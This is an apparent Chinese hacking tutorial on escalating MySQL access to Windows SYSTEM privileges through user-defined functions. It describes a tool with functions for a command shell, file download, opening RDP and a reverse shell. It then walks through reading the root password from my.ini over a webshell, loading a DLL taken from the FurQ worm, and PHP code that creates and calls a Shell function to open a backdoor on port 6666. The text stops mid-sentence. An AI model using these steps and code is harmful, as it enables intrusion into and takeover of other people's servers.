邪恶mysql提权

将MYSQL读写权限转化为system权限一、功能：利用MYSQL的自定义函数功能（再次声明：利用MYSQL UDF提权绝非是溢出，而是MYSQL本身的一个功能），将MYSQL账号转化为系统system权限。二、适用场合：1.目标系统是Windows(Win2000,XP,Win2003)；2.你已经拥有MYSQL的某个用户账号，此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。三、使用帮助：第一步：将PHP文件上传到目标机上，填入你的MYSQL账号经行连接。第二步：连接成功后，导出DLL文件，导出时请勿必注意导出路径（一般情况下对任何目录可写，无需考虑权限问题），对于 MYSQL5.0以上版本，你必须将DLL导出到目标机器的系统目录(win 或 system32)，否则在下一步操作中你会看到No paths allowed for shared library错误。 第三步：使用SQL语句创建功能函数。语法：Create Function 函数名（函数名只能为下面列表中的其中之一） returns string soname 导出的DLL路径；对于MYSQL5.0以上版本，语句中的DLL不允许带全路径，如果你在第二步中已将DLL导出到系统目录，那么你就可以省略路径而使命令正常执行，否则你将会看到Cant open shared library错误，这时你必须将DLL重新导出到系统目录。第四步：正确创建功能函数后，你就可以用SQL语句来使用这些功能了。语法：select 创建的函数名(参数列表)； 每个函数有不同的参数，你可以使用select 创建的函数名(help)；来获得指定函数的参数列表信息。 四、功能函数说明：cmdshell 执行cmd;downloader 下载者,到网上下载指定文件并保存到指定目录;open3389 通用开3389终端服务,可指定端口(不改端口无需重启);backshell 反弹Shell;ProcessView 枚举系统进程;KillProcess 终止指定进程;regread 读注册表;regwrite 写注册表;shut 关机,注销,重启;about 说明与帮助函数;前不久网上公开了一个MySQL Func的漏洞,讲的是使用MySQL创建一个自定义的函数,然后通过这个函数来攻击服务器。最早看到相关的报道是在o-otik上,但是公布的是针对Unix系统的Exploit,并且成功率也不是很高.而近期,国内有高手放出针对Win系统的相关文章,于是我马上找来与朋友一同研究.其实我们早就能想到.当我们在对MSSQLOracle数据库进行攻击的时候,得到了最数据库中高权限的帐户,往往都是执行特殊的扩展过程或者函数来进行攻击的。比如MSSQL有Xp_cmdshell,Oracle可以通过Msvcrt.dll来创建一个特殊的函数.而我们却始终没有想到,作为流行的数据库软件之一的MySQL,也是可以进行函数的创建的.由此看来,MySQL的这个漏洞不应称为漏洞而仅仅是一个技术而已.废话一堆过后,我们来了解一下怎么在MySQL里创建一个函数吧.这比如何利用重要许多,只要了解了原理,运用就能更加灵活,而且可以与其他思想融会贯通.MySQL中创建一个函数的语句为:Create Function FunctionName Returns String|Integer|Real Soname C:function.dll;其中FunctionName指的是函数的名称,C:Function.DLL指的是函数所调用的DLL,而函数名正是DLL中的函数名称.不过这里需要我们注意的是,如果我们需要MySQL可以在函数之中附带一个参数的话,那么就要符合UDF形式的程序编写规则,具体的可以查看MySQL手册的第14节:为MySQL增加新函数.而其中STRING,INTEGET,REAL是函数执行后所返回的值的形式.当然,我们大可不必遵循UDF形式的编写,其实如果我们的函数中使用一个我们要执行的代码,而不使用参数,一样可以达到攻击的效果,比如说System()等等.网上现在以此漏洞进行攻击的FurQ蠕虫就是一个不使用UDF格式的例子.但是注意,这个创建函数的语句必须要求我们所用的MySQL帐户有对mysql这个数据库的写权限,否则无法正常使用.好了.了解了原理之后,我们来实战一下如何使用MySQL提升权限.在这里我们已经通过各式各样的漏洞取得了一个服务器的WebShell,我这里演示的是angel的phpspy,因为PHP默认有连接MySQL的函数,而ASP这些需要使用附加的组件来进行连接,本身不具备条件的.一般来说,在Win系统下面,很多软件都会在系统目录下创建一个叫my.ini的文件,其中包含了很敏感的MySQL信息.而如果我们攻克的主机没有非常好的权限设置的话,我们本身就具有对%windir%目录的浏览权限,所以可以非常容易的读取其中的信息.而且非常多的管理员通常是将root帐户与密码写进这个My.ini,所以一旦我们读到root用户的密码,就可以操纵整个MySQL数据库或者是服务器了.如图1.得到MySQL的Root密码之后,我们需要上传我们的DLL文件,我这里使用的是从FurQ蠕虫中提取的FurQ.dll.执行这个FurQ.DLL中的Shell函数,系统将会在6666端口打开一个带密码的CMDShell,当然,密码我们已经知道,就是FurQ几个字符而已.不过我们现在还没有执行的条件.需要通过MySQL将这个函数创建到MySQL中去.现在,我们用PHPSPY新建一个PHP文件.输入以下的内容$link=mysql_connect(,root,root);if (!$link) die(Could NOt Connect The Database!: . mysql_error();echo Good Boy.Connected!;/这里的rootroot就是从my.ini中读取的用户和密码.mysql_select_db(mysql) or die (use database mysql failed!);echo Yes You Did!;/这里选择使用MySQL数据库表.当然你也可以选择别的,如test.$query=Create Function Shell RETURNS INTEGER SONAME d:wwwrootFurQ.dll;$result = mysql_query($query, $link) or die (Create Function Failed!);echo Goddess.Successed!;/这两句话是关键,执行MySQL的创建函数语句.将d:wwwrootfurq.dll中的Shell函数创建进MySQL中.使得MySQL可以执行这个Shell函数.$query=Select Shell();$result = mysql_query($query, $link) or die (Execute failed);echo Congratulations! Connect The Port 6666 Of This Server VS password:FurQ;/这一步是执行这个Shell函数,打开服务器的6666